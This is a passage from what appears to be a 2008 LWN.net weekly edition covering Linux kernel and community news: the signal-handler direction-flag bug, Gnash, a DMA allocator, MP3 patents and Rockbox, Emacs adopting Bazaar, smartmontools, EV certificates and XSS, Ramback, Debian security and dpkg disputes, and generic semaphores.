sco.com [PDF]).  Unfortunately, this clashes with
Linux signal handlers, which get called, incorrectly, with the flag in
whatever state it was in when the signal occurred.  This has the effect of
leaking one bit of state from the user space process that was running when
the signal occurred to the signal handler, which could be in another process.


That, in itself, is a bug, seemingly with fairly minimal impact.  Prior to 4.3, GCC
would emit a cld (clear direction flag) opcode before doing inline
string
or memory operations, so those operations would start from a known state.
In 4.3, GCC relies on the ABI mandate that the direction flag is cleared before
entry to a function, which means that the kernel needs to arrange that
before calling a signal handler.  It currently doesn't, but a small patch fixes that.


The window of vulnerability is small, but was observed in SBCL.  The
sequence of events that would lead to memory corruption are as follows:

a user space program does an operation (memmove() for example)
that sets DF
a signal occurs for some process
the kernel calls the signal handler
the signal handler does a memmove() in what it thinks is a
forward direction
the memory is copied in the reverse direction, leading to corruption

It is hard to see how that could be turned into a security breach, but it
would be a mistake to assume that it can't.  Other kernel bugs, like the
one that allowed the recent vmsplice()
exploit, have looked liked memory corruption, but were found to be more than
that.  The DF issue may turn out to be harmless from a security standpoint,
but it should not be assumed.


So, now the question is: what to do about it.  It is clear that the kernel
should not leak the DF state to signal handlers, regardless of what GCC
does.  It is interesting to note that this behavior is the same (DF is not
cleared on entry to a signal handler) on BSD
kernels, leading some to claim that it is the ABI that is incorrect and
that GCC should revert to its old behavior.  Solaris kernels do
clear the DF before calling signal handlers.  This problem has existed for
15 years; GCC has always emitted code that worked correctly on kernels
that did not follow the ABI, until now.


Part of the problem is that there are an enormous number of installed
kernels that are vulnerable to this problem, but only if GCC 4.3 is
installed.  That version of GCC is not, yet, in widespread use, so the
thinking is that GCC should revert its behavior now, before it gets into
distributions.  As kernels with the fix become more widespread, the
"proper" behavior could be restored.  The GCC folks don't necessarily see
it that way, so it is unclear what will happen.


While it is true that distributors can control what kernel version and GCC
version they ship, those aren't the only ways that either GCC or
GCC-compiled binaries get installed.  It is a bit of ticking time bomb for
random memory corruption at a minimum.  Handling those bug reports will be
very difficult and time consuming.  While the new behavior of GCC is
correct, and the kernel is broken, it would be very helpful to back out
this change, perhaps providing the new behavior via a command-line argument
for those who are sure their binaries will be running on patched kernels.   Some discussion
on the gcc-devel list would indicate that a GCC 4.3.0.1 or 4.3.1 may be
forthcoming.  


		Still waiting for Flash


Those of us who were using Linux full-time around the turn of the century
will remember that the state of web browsing on Linux was a little scary
then.  The only real option available was the binary-only Netscape 4
client; it was buggy and old.  It really seemed like the web was going to
move forward without Linux, and that there was not a whole lot we could do
about it.


Things have improved somewhat on that front; we now have a few top-quality
web browsers to choose between.  At the same time, though, one might be
forgiven for thinking that we are heading back into a similar situation,
but involving Flash this time around.  For all practical purposes, there is
only one viable option for Flash on Linux: the binary-only plugin provided
by Adobe.  But that plugin is not just proprietary software; it also is
somewhat old and buggy, and there is nothing we can do to fix it.  For an
increasing part of the web experience, we still have a second-rate,
proprietary platform.


When one thinks of Flash, naturally, one thinks of video sites like
YouTube.  But there is more to the Flash experience than silly videos and
obnoxious advertising.  Some parts of Google are heavily into flash, as can
be seen from that company's finance sites or analytics offerings.  Your
editor's children will attest that there's no end of game sites which
require Flash, and for which the Linux plugin fails to work properly.
Looking for any way to reduce the total amount of time spent in airplane
seats, your editor recently investigated "around the world" tickets; that
search ended up at this
travel planning site which, of course, requires Flash.  And so on.
Like it or not, Flash is the language in which an increasing number of
interactive sites are being coded, and Linux does not have proper support
for it.


With this in mind, your editor decided to give the recently-announced Gnash 0.8.2 release a try.  This
release was billed as the first beta version of Gnash, so there was reason
to hope that it would be something close to a true solution to the Flash
problem.  In reality, Gnash is a step in the right direction, but the Flash
issue will be with us for some time yet.


For now, the acid test for a Flash player would appear to be YouTube, so
that is the first place your editor went.  The experience there was mixed.
It is, in fact, possible to watch YouTube videos using the Gnash Firefox
plugin.  Hearing them is another matter, though; they all played silently.
It would not be surprising to learn that getting audio is a matter of
filling in a missing codec - but would sure be nice if the software were to
say something to that effect.  Pausing and playing the video worked, but
skipping around in it did not.  Playing videos from other sites was
uniformly unsuccessful.


The "around the world" calculator appeared to load properly, but then took
off as if somebody were punching all of its buttons at once.  Charts on
Google sites are uniformly blank.  Some flash games mostly worked, others
showed more input-related confusion.  Few of them were truly playable.  On
the other hand, Flash "intros" and advertisements mostly work as intended -
just what your editor wanted.


So Gnash is not really there yet.  In truth, this software is not in a
condition where the use of the term "beta" makes sense; there is a
lot of work yet to be done.  There are few of us clamoring for
support for more obnoxious advertising - especially among the LWN
readership, as your plentiful emails over the last couple of months have
made clear.  What we want is working support for the useful Flash
applications out there - and there are a few of those at this point.  Gnash
does not, currently, provide that support.  (Your editor also tried out Swfdec 0.6.0, with generally
worse results).


That said, it is clear that a lot of work has been done to get Gnash to
this point.  Your editor has no real way to judge how much more is required
to get full support for even Flash version 7; chances are it is not a
small job.  Needless to say, support for newer versions of Flash will
require even more work.  But there now appears to be a solid platform upon
which that work can be done, and that is an important start.  Gnash has the
look of a project which has overcome some of the biggest initial hurdles
and is now setting a pace to finish the job.  With luck, it will have
reached the point where the fact that it almost works will inspire
new developers to come in and fill in the remaining pieces.


Adobe has the ability to make this job a lot easier.  Your editor has
heard, informally, that the company has taken a less hostile position
toward the Gnash developers than it had in the past, but it certainly is still not
helping them.  The Flash specifications are not available to anybody trying
to create a Flash player, and, unsurprisingly, the Flash EULA
forbids any sort of reverse engineering.  That EULA, incidentally, also
forbids running Adobe's player on any "non-PC device," including tablets
and phones.  That restriction suggests that Adobe sees business
opportunities in the lack of a free Flash player for such systems and
intends to ensure that this scarcity continues.  So, despite the
occasionally friendly noises Adobe has been making toward the Linux
community, we should not expect a great deal of help from that direction. 


Someday, people will figure out that closed standards (like Flash) are best
avoided.  Meanwhile, Flash is a fact of life that we will need to
deal with.  It appears that we are getting closer to being able to deal
with it - but we are not there yet.

		A better DMA memory allocator


As any device driver author knows, hardware can be a pain sometimes.  In
the early days of Linux, peripherals attached to the ISA bus inflicted
their particular variety of pain by being unable to use more than
24 bits to access memory.  What that meant, in practical terms, was
that ISA devices could not perform DMA operations on memory above 16MB.
The PCI bus lifted that restriction, but, for some time, there were quite a
few "PCI" devices that were minimally modified ISA peripherals; many of
those retained the 16MB limit.

To handle the needs of these devices, Linux has long maintained the DMA
memory zone.  Drivers which need to allocate memory from that zone would
specify GFP_DMA in their allocation requests.  The memory management code
takes special care to keep memory in that zone available so that DMA
requests can be satisfied.  In this way, the system can provide reasonable
assurance that memory will be available to perform DMA in ways which meet
the special needs of this particularly challenged hardware.

The only problem is that there aren't a whole lot of devices out there
which still have the old 24-bit addressing limitation.  So the DMA zone
tends to sit idle.  Meanwhile, there are devices with other sorts of
limitations.  Many peripherals only handle 32-bit addresses, so their DMA
buffers must be allocated in the bottom 4GB of memory.  There is a subset,
however, with stranger limitations - 30 or 31-bit addresses, for example.
The kernel's DMA library provides a way for drivers to disclose that sort
of embarrassing limitation, but the memory management code does not really
help the DMA layer make allocations which satisfy those constraints.  So
drivers for such devices must use the DMA zone (which may not be present on
all architectures), or hope that normal zone memory fits the bill.

Andi Kleen has set out to clean up this situation with a new DMA memory allocator.  His
solution is to take a chunk of memory out of the kernel's buddy allocator
entirely and manage it in an entirely different way, forming a reserve pool
for DMA allocations.  The result is a bit
of a departure from normal Linux memory management algorithms, but it may
well be better suited to the task at hand.


The new "mask" allocator grabs a configurable chunk of low memory at boot
time.  Allocations from this region are made with a separate set of calls,
with the core API being:


alloc_pages_mask() looks a lot like the longstanding
alloc_pages() function, but there's some important differences.
The size parameter is the desired size of the allocation, rather
than the "order" value used by alloc_pages(), and mask
describes the range of usable addresses for this allocation.  Though
mask looks like a bitmask, it is really better understood as the
address value that the allocated memory should have; "holes" in the mask
would make no sense.

A call to alloc_pages_mask() will first attempt to allocate the
requested memory using the normal Linux memory allocator, on the assumption
that the reserved DMA memory is an especially limited resource.  If the
allocation fails, perhaps because there's no physically-contiguous chunk of
sufficient size available, then the allocator will dip into the reserved
DMA pool.  If the normal allocation succeeds, though, the allocated memory
must still be tested against the maximum allowable address: the normal
memory allocator, remember, has no support for allocating below an arbitrary
address.  So if the returned memory is out of bounds, it must be
immediately freed and the reserved pool will be used instead.

That reserved pool is not managed like the rest of memory.  Rather than the
buddy lists maintained by the slab allocator, the DMA allocator has a
simple bitmap describing which pages are available.  It will normally cycle
through the entire memory region, allocating the next available chunk of
sufficient size.  If that chunk is above the memory limit, though, the
allocator will move back to the lower end of the reserved pool and allocate
from there instead.  Since DMA allocations tend to be short-lived, one
would expect that a suitable block of memory would either be available or
become available in the near future.

One other difference of note is that, unlike the slab allocator, the DMA
allocator does not round memory allocation sizes up to the next power of
two.  DMA allocations can be relatively large, so that rounding can result
in significant internal fragmentation and memory waste.

At the next level up, Andi has added a new form of mempool which uses the
DMA allocator:


This pool will behave like normal mempools, with the exception that all
allocations will be below the limit passed in as mask.  These pools are used
in the block layer, where memory allocations for DMA must succeed.


One might object that reserving a big chunk of low memory for this purpose
reduces the total amount of memory available to the system - especially if
the DMA allocator is cherry-picking normal memory whenever it can anyway.
But the cost is not as bad as one might think.  These patches do away with
the old DMA zone, which, for all practical purposes, was already managed as
a reserved (and often unused) memory area.  Some 64-bit architectures also
set aside a significant chunk (around 64MB) of low memory for the swiotlb -
essentially a set of bounce buffers used for impedance matching between
high memory (&gt;4GB) buffers and devices which cannot handle more than
32-bit addresses.  With Andi's patch set, the swiotlb, too, makes
allocations from the DMA area and no longer has its own dedicated memory
pool.  So the total amount of memory set aside for I/O will not change very
much; it could, in fact, get smaller.


For most driver authors, there will be little in the way of required
changes if this patch set gets merged.  The DMA layer already allows
drivers to specify an address mask with dma_set_mask(); with the
DMA allocator in place, that mask will be better observed.  The one change
which might affect a few drivers is further down the line: eventually the
GFP_DMA memory allocation flag will go away.  Any driver which
still uses this flag should set a proper mask instead.

So far, there has been little discussion resulting from the posting of
these patches.  Silence does not mean assent, of course, but it would
appear that there is little opposition to this set of changes.

		Some topics related to MP3 players


In many parts of the world, the U.S. is looked upon as a place with
particularly poor taste in "intellectual property" legislation; the DMCA
and software patents are often held up as examples.  DMCA-like laws have
since spread to other parts of the planet, which, for some reason, has not
made people living there any more appreciative of the American legal
regime.  But it is often pointed out that software patents remain an almost
entirely American problem; people in other parts of the world (Europe, say)
need not worry about them.


If only it were so.  On March 5, German police raided a booth at the CeBit
conference in Hannover.  That booth, run by Meizu, contained an
iPhone-clone product, but nobody cared about that.  Instead, the contraband
which absolutely had to be suppressed was a music player for which Sisvel
(an Italian company which has done this kind of thing before)
had not been paid royalties on its MP3 patents.  The player, as it happens,
did not even have MP3 playback capability, but that didn't seem to matter.
The police duly cleared the booth of all mention of the offending device
and saved another day for free enterprise.


This is a pure software patent action, and the
U.S. has no part in it.  Software patents are truly a global problem.
(Police raids raise the stakes in interesting way, though; even in the
U.S., things usually start with a polite letter from a lawyer first).
Anybody who wonders why companies like Red Hat exercise great care around
software patents (and MP3 patents in particular) need only look at episodes
like this.  The selling of enterprise Linux products is likely to be
distinctly harder if your prospective customers see your conference booth
being forcibly shut down by the authorities.


Meanwhile, it occurred to your editor, while thinking about music players,
that little has been said about the Rockbox project on LWN in recent times.
Rockbox, remember, is a GPL-licensed firmware which runs on a wide
variety of music players.  It offers a wider range of features, has
more codecs, is more customizable, and has better accessibility support
than the stock firmware on any of these devices.  And it's free software.

Since LWN last looked at this project, the Rockbox developers have added a
number of new features and new platforms.  The abandoned 3.0 release has never
happened; the Rockbox developers appear to have given up on the idea of
formal releases for now.  The daily snapshots generally work quite well,
though, and there are lots of satisfied Rockbox users out there.


[PULL QUOTE: 
Despite the fact that Rockbox supports a lot of players,
absolutely none of the supported platforms are currently in production.  So
anybody looking to buy a player which can run Rockbox must go digging
around on auction sites.
 END QUOTE]


The only problem is: it's not clear how many more such users may arrive in
the future.  Despite the fact that Rockbox supports a lot of players,
absolutely none of the supported platforms are currently in production.  So
anybody looking to buy a player which can run Rockbox must go digging
around on auction sites.  Many Rockbox users do exactly that, but many more
potential users would rather not get their devices that way.

Rockbox ports to current devices are underway, but the developers are fighting an
uphill battle.  Manufacturers tend to be uncooperative when it comes to
releasing hardware information, so a certain amount of reverse engineering
is required.  And, by the time that work is done, the manufacturers have
moved on to a new product.  Music players are consumer electronics devices,
and, like most such devices, their product lifetime tends to be quite
short.  So developers on a project like Rockbox will forever be trying to
catch up.

Your editor, meanwhile, still lugs around his ancient iRiver H340.  People
look at it strangely, as if they expect there to be a hatch on the back
so that the user can occasionally add another shovel full of coal.  But it
works beautifully with Rockbox, and a replacement looks hard to find.  Your
editor wishes that at least one manufacturer would realize that it could
provide better functionality at a lower cost by designing its players to
run Rockbox from the beginning.  Perhaps the project needs better advocacy
within the player industry.


There is another approach which could be considered here.  The OpenMoko
project is trying to rearrange the mobile telephone market by offering a
completely open product.  Surely a music player, being a much simpler
device, would be amenable to the same treatment?  As it turns out, there
are a couple groups of people trying to jump start just this kind of
effort.  They have a
prototype design, and a
competing design as well.  Both look like they could produce a
respectable player at a reasonable cost - a player designed to run free
software from the outset.


Designing a device which can run Rockbox and produce decent audio (and
video) output is not that hard, given the components which are available.
Turning it into a product which is small and sleek enough that people want
to buy it seems likely to be harder.  Getting a full device manufactured at
a reasonable cost may be the hardest of all; that requires significant
up-front money and a distribution channel which can sell enough units to make
the whole thing cost-effective.  There's also the little issue of those MP3
patents to take care of.


There is no real sign that the Rockbox player developers are thinking on
this level at this time.  One of the prototype designs carries a Creative
Commons noncommercial license in an attempt to prevent others from thinking
that way.  So the resulting hardware may end up being little more than a
kit for especially dedicated hobbyists.  Unless somebody picks up the ball
and tries to commercialize a product like this, Rockbox may be stuck in its
role as the software of choice for last year's players.  The good news in
all this is that Linux-based tablet devices seem likely to become cheaper,
more abundant, and more compact.  Since these devices can make fine media
players, we may eventually get our completely open gadget via that path.
Modulo patent problems, of course.

		Emacs chooses Bazaar


The Emacs development process is undergoing some changes; Richard Stallman
has handed off project
maintenance duties, while a change in the version control system (VCS)
seems to be in the offing. Some of the  modernization suggestions made by
Eric Raymond last December are taking root.  Stallman has not completely
stepped away from Emacs development—it's doubtful anyone expected him
to—but his approach on how to choose a VCS for Emacs is raising a few
eyebrows. 


Currently, Emacs is tracked with CVS, but a distributed VCS (DVCS) is definitely
planned down the road—how far is unclear at this point.  In
earlier discussions, Stallman was particularly interested in the offline
capabilities of DVCS; being able to do commits, diffs, and see revision
history while 
unconnected to the internet is a useful feature for him.  Many other Emacs
developers see a DVCS as a major upgrade to the development process, the
question then becomes which DVCS to use.


The main contenders are git, Mercurial (aka hg), or Bazaar (aka bzr); there are other options, of
course, but they were quickly
eliminated due to speed or feature set issues.  There was some hope that
a comparative VCS study that Raymond was working on would help lead the project to the proper
choice, but the study has been delayed—a major release of Wesnoth is
underway which has taken Raymond from that task.


There were some discussions of the merits of the various systems but, in
the meantime, Bazaar joined the GNU project which changed the equation
somewhat.  Stallman announced:

We should use Bzr because that is becoming a GNU package.
GNU packages should show loyalty to each other when possible,
and in this case it is possible.


As might be expected, short-circuiting a technical discussion for a
political expedient is not met with universal approval.  Juanma Barranquero
sums up his (and others') objections:

What I'm trying to say is: I won't discuss which dVCS we choose
(unless it makes Windows development a PITA). But I agree with Jeremy
Maitin-Shepard that the cause of free software is strengthened by us
selecting among the free alternatives the one that best serves our
technical, not political, needs.


There is a certain irony in noting that one of the perceived weaknesses of git was its
poor support for Windows development.  It is
certainly understandable, but the idea that one of the flagship GNU
projects would make a decision based on tool availability for a proprietary
operating system gives one pause.  That isn't one of
Stallman's requirements of course, he sees the decision as essentially a choice amongst
equals:

We already know the most important thing about what we will find from
a careful study of git, mercurial and Bzr.  We will find that each has
its advantages and disadvantages -- but none of them conclusive.  Each
will be preferred by some people, but any one of them would work out
well enough.


As Thomas Lord (author of another GNU VCS, arch), points out, there is a cost to
agonizing over a choice like this:


Probably so but any group of smart people could easily spend
a year arguing about it.   Not even a year arguing about which system
is best but a year arguing just about what "best" means in this context.

Over-optimizing a choice like that can be a *huge* resource
suck and projects and groups fail all the time because of falling
into such traps.


No technical barriers to using Bazaar have been raised, it is, as Stallman
asserts, a fairly arbitrary choice.  Unsurprisingly, Stallman chooses the one
that serves his agenda.  The new maintainers, Stefan Monnier and Chong
Yidong, presumably agree with that
agenda, in any case they have not indicated any resistance to the
choice. 


So it seems that Emacs will be moving to Bazaar.  Jason Earl has been
pulling the CVS history into a Bazaar repository that should be available
soon.  The import process seems to be taking a fair amount of time—something on the order of a week—which is hopefully not indicative of
the operational speed of Bazaar.  Assuming the conversion works and
developers can get their work done using it, this would be a pretty
high-profile project to use it.   Other GNU software may follow suit, which
could be a big boost to the visibility of Bazaar; precisely
what Stallman was aiming for.


		Monitor disks with the S.M.A.R.T. monitoring tools


The 
S.M.A.R.T. Monitoring Tools (Smartmontools) is a cross-platform
set of utilities that are able to monitor operating data from
hard drives:


The smartmontools package contains two utility programs (smartctl and smartd) to control and monitor storage systems using the Self-Monitoring, Analysis and Reporting Technology System (SMART) built into most modern ATA and SCSI hard disks.
In many cases, these utilities will provide advanced warning of disk degradation and failure. It should run on any modern Darwin (Mac OSX), Linux, FreeBSD, NetBSD, OpenBSD, Solaris, OS/2, eComStation, QNX, or Windows system.


Wikipedia defines
SMART
as the Self-Monitoring, Analysis, and Reporting Technology:
"Mechanical failures, which are usually predictable failures, account for 60 percent of drive failure. The purpose of S.M.A.R.T. is to warn a user or system administrator of impending drive failure while time remains to take preventative action  such as copying the data to a replacement device. Approximately 30% of failures can be predicted by S.M.A.R.T."


Version 5.38 of Smartmontools was recently

announced.  Improvements include:

Several Libata/Marvell driver improvements.
 New additions to the drive database.
 ATA-8 updates.
 New Dragonfly support.
 Support for the QNX operating system.
 A new no-fork option for smartd.
 Better support for systems with large numbers of disks.
 Improvements to the descriptions of the SMART Attribute list.
 A workaround for a Samsung firmware bug.
 Improvements to the CCISS support system.
 New selective self-test command line options.
 Build system portability improvements.
 Numerous bug fixes.


Building Smartmontools was straightforward.  The code was downloaded and
unpacked.  The usual configure, make and make install steps were
performed on an Ubuntu 7.04 system with no troubles.
The operation instructions from the README file were followed and
the software was able to discover data from the one hard drive on
the test system.  This
example output
shows the wide variety of drive information that Smartmontools
can display.  The drive appears to be healthy.


If you are a systems administrator who needs to keep track of hard
drive reliability data, Smartmontools be able to provide
some useful drive information.  With the addition of a small
amount of glue-logic scripting, it should not be too difficult to
set up an automated drive monitoring system.


		Extended Validation certificates and cross-site scripting


Cross-site scripting (XSS) is a frequent topic on security forums because
it is a common web application flaw that can lead to variety of unpleasant
surprises.  One of the more frequently seen abuses of an XSS flaw is in the
aid of a phishing attack.  With the advent of Extended Validation (EV)
certificates coupled with the accompanying browser UI changes, some XSS attacks will
become much more powerful.


By now, most users are familiar with SSL certificates, which are used to
authenticate one or both sides of an HTTPS connection to the other.  EV
certificates are a step up from a 
more pedestrian SSL certificate as the recipient must undergo more scrutiny from the
certificate authority (CA) before being granted one.  We covered EV certificates in more
detail in November 2006, but they are just now starting to be installed
more widely.


Netcraft reported
the problem a few weeks ago with regard to sourceforge.net.  Sourceforge is one of
the 4,000 or so sites with an EV certificate, but it also has an XSS
problem.  So anyone using the site for XSS purposes now gets the benefit of
the higher trust that is supposed to be embodied in an EV certificate.


Browser vendors are being encouraged to highlight the EV certificates in
their UI so as to give users more confidence in those sites.  The most
recent Firefox 3 betas as well as IE7 are highlighting the site name in
green in the address bar to denote this higher trust.  Unfortunately, the
extra validation does not extend to testing the site for XSS flaws, which could
leave users easily fooled.


A phishing attack could use an XSS flaw in a search box or error message, for
example, to add content to the appearance of a site.  That content is really coming
from the XSS attack but it would appear under the "green means go" address
bar for the EV certificate-protected site.  That content could include a
login screen that sent the credentials elsewhere or a cookie stealing
attack for session hijacking.  For any site with sensitive information, XSS
attacks are already a problem, EV certificates just add another mechanism
for exploiting the user's trust.


Much like the padlock icon that appeared many years
ago to denote a "secure" (really, just encrypted) connection, this new green address bar indicator is
somewhat difficult to explain.  Based on the vetting process for EV
certificates, there should be a real entity behind an EV
certificate—or at least there was one at the time of
issuance—but it is by no means an endorsement of the security of everything on a web
page that has one.  It is, like the original padlock, more nuanced than that.


Unfortunately, users are not good at security nuances.  They want yes or no
answers to "Is this site safe?"; that answer is nearly always "maybe" or
perhaps "probably".  At one time, the padlock icon was seen as a "yes" answer;
now the green address bar may take its place.  Somehow users need to be
taught to look beyond simple answers and websites need to clean up their
act so that their users are not scammed. 


The number of sites with XSS
problems is staggering (a look at xssed.com
is instructive) and new ones crop up all the time.
In many ways, XSS is an attack against users rather than directly against a
site.  This may make it less of a priority to fix than a direct attack,
like a SQL injection, might be.  That is very unfortunate for their users, especially if
they have a shiny new EV certificate.


		How to use a terabyte of RAM


We have not yet reached a point where systems - even high-end boxes - come
with a terabyte of installed memory.  But products like those from Violin Memory make it clear that
the day is coming; one can buy a Violin box with 500GB in it now.  So it
seems worth asking the question: once one has spent the not inconsiderable
sum to buy a box like that, what does one do with all that memory -
especially now that the Firefox developers have gotten serious about fixing
memory leaks?

Perhaps it's time for some wild ideas.  And there is no better source for
such ideas than Daniel Phillips, whose Ramback patch has stirred up a
bit of discussion this week.  The core idea behind Ramback is that all of
that memory is turned into a ramdisk, but with a persistent device attached
to it.  In normal conditions, all application I/O involves only the
ramdisk, and is, thus, quite fast ("Every little factor of 25
performance increase really helps.").  In the background, the kernel
worries 
about synchronizing data from the ramdisk onto permanent storage.  But the
synchronization process is mostly concerned with I/O performance, rather
than providing guarantees about just when any given block will make it onto
the disk platters.


Ramback thus differs from the normal block I/O caching done by the kernel
in a number of ways.  It keeps the entire device in memory, so that, in
steady-state operation, applications need never encounter a disk I/O
delay.  Should an application call fsync(), the expected result
(blocking until the data is written to physical media) will not happen.
Filesystems take great care to order operations in a way that minimizes the
risk of data loss in a crash; Ramback ignores all of that and writes data
to physical media in whatever order it decides is best.  As Daniel put it, the "most basic principle" of
Ramback's design is:


	[T]he backing store is not expected to represent a consistent
	filesystem state during normal operation.  Only the ramdisk needs
	to maintain a consistent state, which I have taken care to ensure.
	You just need to believe in your battery, Linux and the hardware it
	runs on.  Which of these do you mistrust?


Ramback does include an emergency mode which will endeavor to bring the
disk up to date in a hurry should the UPS indicate that power has been
lost.  But that does not seem to be enough for everybody.
In the resulting discussion, nobody complained about the sort of
performance benefits that a tool like Ramback could provide.  But there was
a lot of concern about data integrity; it seems that many people distrust
their battery, their hardware, and Linux.  And that has led to a
sort of impasse, with several developers claiming that Ramback would be too
risky to use and Daniel dismissing their concerns as FUD.

FUD or not, those concerns are likely to be a difficult barrier for Ramback
to overcome.  Meanwhile, Daniel is looking for people to help test out the
code, but that presents challenges of its own:


	This driver is ready to try for a sufficiently brave developer.  It
	will deadlock and livelock in various ways and you will have to
	reboot to remove it.  But it can already be coaxed into running
	well enough for benchmarks, and when it solidifies it will be
	pretty darn amazing.


So far, reports from suitably courageous testers have been, well, scarce.
Your editor fears that this work could suffer the same fate as many of
Daniel's other patches: they can contain brilliant ideas and great coding
but just don't quite survive the encounter with the real, messy world.
But we need people  thinking about how our systems will work in the
coming years; one hopes that Daniel won't stop.

		News from the Debian security team


A note from the Debian security
team shows a number of new initiatives and plans.  The team recently
expanded by two while looking for up to two more folks to round it out.
That, coupled with a number of new initiatives makes for some interesting
news from the Debian security world.


Adding people to the team adds
more eyes to find bugs, but, perhaps more importantly, adds more hands to
actually patch the code when bugs are found.  In many cases, the upstream
project will
fix the vulnerability in its latest release, leaving the distribution security team
to backport the fix into whatever version they are shipping.  This takes
knowledge; one must understand the code and how to build it for Debian. They
have not set the bar low for the kind of folks they are looking for:

You need to be familiar with how the wide variety Debian packages
  are maintained, patched and built. If you're not scared by
  packages generating their patch series by applying sed statements
  from cdbs include files before passing the patches through an
  awk filter to quilt until they're finally built with yada, you
  might be the right person.


The team is now using Request Tracker to track security bugs and updates.
Two separate categories have been established, one for upstream bugs that
are not yet public, the other for publicly known bugs.  This allows the
team to track all the bugs, but not prematurely release information about
security vulnerabilities that are not yet public.


Two other changes will help with the quality of security patches.  The
first is a public patch review mailing list that is being formed to allow
interested parties to see what patches are being proposed.  Presumably this
would only apply to public vulnerabilities or the list membership will need
to be tightly controlled.


The other quality boosting change is to use the time between when a patch
is completed and when it is has been ported and built for all of the
architectures to further test the patch.  The team is looking for large
installations that normally install security updates in their own test
environment before rolling them out to their live systems.  Leveraging
those test environments to further exercise the patched code can only lead
to better code in the long run.


Security is an important part of any distribution, so it is nice to see
these kinds of initiatives.  More team members, testing, and tracking are
all likely to bring about a faster and better response to security problems
in the future.


		Who maintains dpkg?


The Debian project is known for its public brawls, but the truth of the
matter is that the Debian developers have not lived up to that reputation
in recent years.  The recent outburst over the attempted "semi-hijacking"
of the dpkg maintainership shows that Debian still knows how to run a flame
war, though.  It also raises some interesting issues on how packages should
be maintained, how derivative distributions work with their upstream
versions, and what moral rights, if any, a program's initial author retains
years later.


Dpkg, of course, is the low-level package management tool used by
Debian-based distributions; it is the direct counterpart to the RPM tool
used by many other systems.  Like RPM, it is a crucial component in that it
determines how systems will be managed - and how much hair administrators
will lose in the process.  And, like RPM, it apparently causes a certain
sort of instability in those who work with it for too long.


Ian Jackson wrote dpkg back in 1993, but, by the time a few years had passed,
Ian had moved on to other projects.  In recent times, though, he
has come back to working on dpkg - but for Ubuntu, not for the Debian
project directly.  One of his largest projects has been the triggers
feature, which enables one package to respond to events involving other
packages in the system.  This feature, which is similar to the RPM
capability by the same name, can help the system as a whole maintain
consistency as the package mix changes; it can also speed up package
installations.  Triggers have been merged into Ubuntu's dpkg and are
currently being used by that distribution.


The upstream version of dpkg shipped by Debian does not have trigger
support, though, and one might wonder why.  If one listens to Ian's side of
the story, the merging of 
triggers has been pointlessly (perhaps even maliciously) blocked for
several months by Guillem Jover, the current Debian dpkg maintainer.  So
Ian concluded that the only way to get triggers into Debian in time for the
next release ("lenny") was to carry out a
"semi-hijack" of the dpkg package.  By semi-hijack, Ian meant that he
intended to displace Guillem while leaving in place the other developers
working on dpkg, who were encouraged to "please carry on with your
existing working practices."


Ian also proceeded to upload a version of dpkg with trigger support, and
without a number of other recently-added changes.  It is worth noting that
all of this work went into a separate repository branch, pending a final
resolution of the matter.  So when the upload was rejected (as it was) and
Ian was deprived of his commit privileges (as he was), there was no real
mess to clean up.


Those wanting a detailed history of this conflict can find it in this posting from Anthony Towns.  It is a long
story, and your editor will only be able to look at parts of it.


One of the relevant issues here is that Guillem Jover appears to be a busy
developer who has not had as much time to maintain dpkg as is really
needed.  Since the beginning of the year, he has orphaned a number of other
packages (directfb and bmv, for example) in order to spend more time on
dpkg.  But, as a result of time constraints, a number of dpkg patches have
languished for too long.  

While this was happening, Guillem put a fair amount of the time he did have
into reformatting the dpkg code and making a number of other low-level
changes, such as replacing zero constants with NULL.  Ian
disagrees strongly with the reformatting and such - unsurprisingly, the
original code was in his preferred style.
And this is where a lot of the conflict comes in, at two different levels.
Ian disagrees with the coding style changes in general, saying: 


	Everyone who works on free software knows that reformatting it is a
	no-no.  You work with the coding style that's already there.


Many developers will disagree on the value of code reformatting; some
projects (the kernel, for example) see quite a bit of it.  Judicious
cleaning-up of code can help with its long-term maintainability.  All will
agree, though, that reformatting can make it harder to merge large changes
which were made against the code before the reformatting was done.  This
appears to be a big part of Ian's complaint: unnecessary (to him) churn in
the dpkg code base makes it hard for him to maintain his trigger patches in
a condition where they can be merged.


Code churn is a part of the problem, but Ian's merge difficulties are also
a result of doing the trigger work in the Ubuntu tree rather than in Debian
directly.  Ian did try to
unify things back in August, but that was after committing Ubuntu to
the modified code.  Ubuntu's dpkg is currently significantly different from
Debian's version, and, while one assumes that, sooner or later, Debian will
acquire the trigger functionality, there is no real assurance that things
will go that way.  Dpkg has been forked, for now, and the prospects for a
subsequent join are uncertain.


Ian also asserts that, as the creator of dpkg, he is entitled to
special consideration when it comes to the future of that package.  His
semi-hijack announcement makes that point twice.  But one of the key features
of free software is this: when you release code under a free license,
you give up some control.  It seems pretty clear that Ian has long since lost
control over dpkg in Debian.


So who does control this package, and how will this issue be resolved?
Certainly Ian's hijack attempt found little sympathy, even among those who
think that dpkg has not been well maintained recently.  There are some who
say that the disagreement should be taken to the Debian technical committee, which
is empowered to resolve technical disputes between developers.  But faith
in this committee appears to be at a low point, as can be seen in this recent proposal to change how it is selected:


	 It's been pretty dysfunctional since forever, there's not much
	 that can be done internally to improve things, and since it's
	 almost entirely self-appointed and has no oversight whatsoever the
	 only way to change things externally is constitutional change.


Meanwhile, the discussion has gone quiet, suggesting that, perhaps, it has
been moved to a private venue.  The dpkg commit
log, as of this writing, shows that changes are being merged, but
triggers are not among them.  It is hard to imagine that the project will
fail to find a way to get the triggers feature merged and the maintenance
issues resolved, but that does not appear to have happened yet.

		Generic semaphores


Most kernel patches delete some code, replacing it with newer and
(presumably) better code.  Much of the time, it seems, the new code is more
voluminous than what came before.
Occasionally, though, a patch comes along which
deletes over 7600 lines of code - replacing it with a mere 314 lines -
while claiming to maintain the same functionality.  Matthew Wilcox's generic semaphore patch is one
of those changes.


In essence, a semaphore is a counter with a wait queue attached to it.
When kernel code wants to access the resource protected by the semaphore,
it makes a call to:


This call will check the counter associated with sem; if it is
greater than zero, the counter will be decremented and control returns to
the caller.  Otherwise the caller will be put to sleep until sometime in
the future when the counter has been increased again.  Increasing the
counter - when the the protected resource is no longer needed - is done
with a call to up().  Semaphores can be used in any situation
where there is a need to put an upper limit on the number of processes
which can be within a given critical section at any time.  In practice,
that upper limit is almost always set to one, resulting in semaphores which
are used as a straightforward mutual exclusion primitive.


In current kernels, semaphores are implemented with highly-optimized,
architecture-specific code.  There are, in fact, more than twenty
independent semaphore implementations in the kernel code base.  Matthew's
patch rips all of that out and replaces it with a single, generic
implementation which works on all architectures.  After the patch is
applied, a semaphore looks like this:


